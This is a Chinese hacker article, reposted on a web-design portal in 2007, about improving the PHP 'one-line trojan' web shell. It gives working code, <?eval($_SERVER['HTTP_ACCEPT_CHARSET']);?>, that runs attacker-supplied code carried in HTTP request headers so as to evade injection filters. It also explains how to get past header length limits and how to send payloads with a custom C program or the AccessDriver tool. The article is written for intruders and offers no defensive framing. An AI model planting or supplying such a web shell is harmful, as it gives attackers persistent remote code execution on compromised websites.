载入中…
 | 网站首页 | 新知评论 | 网站运营 | 技术文档 | 源码下载 | 模板素材 | 网页特效 | 酷站推荐 | 论坛交流 | 软件下载 | 
您现在的位置: 网页吧 > 技术文档 > 网络应用 > 网络安全 > 正文
黑客经验谈:关于一句话木马的更新思想
作者:未知    技术文章来源:wangyeba.com    点击数:    更新时间:2007-7-25  收藏此文:收藏此文到QQ书签

一种关于一句话木马的更新思想

这篇文章大概是涉及到了web,注入,一句话木马,很多人觉脚黑别人网站有点低级和为之不齿,更多名门正派老黑客都不削于这种技术。

传统的一句话木马如果碰到这台机器刚刚好升级,或者因为发现被入侵,装了一套过滤系统,这台机器上的一句话木马基本上成了残废,因为这个时候入侵者的代码数据无法上传到一句话木马,无法运行,也就没了这个功能了。

不过我不知道大家为什么这么久都没发现有一个地方,其实一直存在着漏洞,如果用在一句话木马上,一句话木马的前途将会非常光明。任何的过滤系统都不能够阻挡你的执行数据的目的,就算他的get,post,cookie,xml,rss全部严格过滤也无济于事。甚至这个方法将很难有有效的防治办法。下面介绍这个办法:

先看一段代码:

<?
//$_SERVER里面可以是以下几个:
//HTTP_ACCEPT
//HTTP_ACCEPT_CHARSET
//HTTP_ACCEPT_ENCODING
//HTTP_ACCEPT_LANGUAGE
//HTTP_CONNECTION
//HTTP_HOST
//HTTP_REFERER
//HTTP_USER_AGENT )
?>
<?eval($_SERVER["HTTP_ACCEPT_CHARSET"]);?>

放出这个,肯定很多人就明白了。就是利用http头的一些信息附带你的数据上去,作为一句话木马执行的参数。

不过明白的这些人肯定会有以下几个问题:

1.为什么说很难被防止.

因为http头信息有丰富的非法字符,比如代码中常用的*、逗号、句号、单引号、双银号、小括号等其他的字符,如果把防注入程序用于http头,那恐怕几乎所有的正常数据都将被防止了。所以不可能对http进行过滤,需要非常复杂的的手法才能,相信没有人会去开发这种软件。

2.http头部够长吗?通常要执行的代码将会很长。

我测试过,iis和apache对于http头的数据确实有长度限制,这个限制大概是10,000-15,000个字符,也就是15KB。如此长的容量,我想传个简单的语句上去已经绰绰有余了,况且当真碰到只有100多个字符限制的服务器也可以先增量写入到session,然后从session中取出执行即可。

3.如何利用?

其实写个简单的代码是最好的了,本文附件中有带一个c源代码(gethttp.c)是简单的自定义http头信息,你可以用它来上传你的数据。

其次还可以借助一个工具:accessdriver。

运行之后按f4按键,点击到extras tool页面,点击该页面下的http debugger子页面,在该页面的http address输入你的一句话木马页面,选择mode的get,点击mode上面一点的header data,会出现一个输入框,这个就是给你自定义http头的地方,其他地方我就不用说了。大家看看就会明白,这个工具很好用。

今天就介绍到这里吧。

 
发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
  • 上一篇技术文章:

  • 下一篇技术文章:
  • 读 者 评 论
    姓 名: * 游客填写  ·注册用户 ·忘记密码
    主 页:
    评 分: 1分 2分 3分 4分 5分
    评论内容:
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  •        Copyright © 2005-2006 wangyeba.com . All rights reserved. 业务QQ:373985540
            带宽支持:南京你来我往信息技术有限公司 技术支持: 湖南新思维网络
         信产部备案:湘05010653